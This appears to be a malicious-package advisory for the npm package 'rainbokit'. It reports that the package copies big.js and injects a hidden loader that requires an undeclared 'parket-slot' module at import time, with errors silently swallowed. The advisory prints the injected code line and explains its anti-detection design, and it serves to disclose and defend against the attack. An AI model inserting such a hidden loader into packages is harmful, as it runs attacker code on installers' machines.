MAL-2026-6339

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555) The package publishes as `rainbokit` but ships a verbatim copy of the legitimate `big.js` library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both `big.js` (~line 488) and `big.mjs` contain an injected block `try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }` inserted into the middle of the otherwise-unmodified big.js source. When a consumer does `require('rainbokit')` or `import 'rainbokit'`, this block runs `parket-slot.from_str()` — code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). `parket-slot` is not declared in `dependencies`; the only declared dependency is `log-taker@^0.0.9`, which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves `parket-slot` and `log-taker` from sibling packages they control. The combination of identity spoofing of a popular package, hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.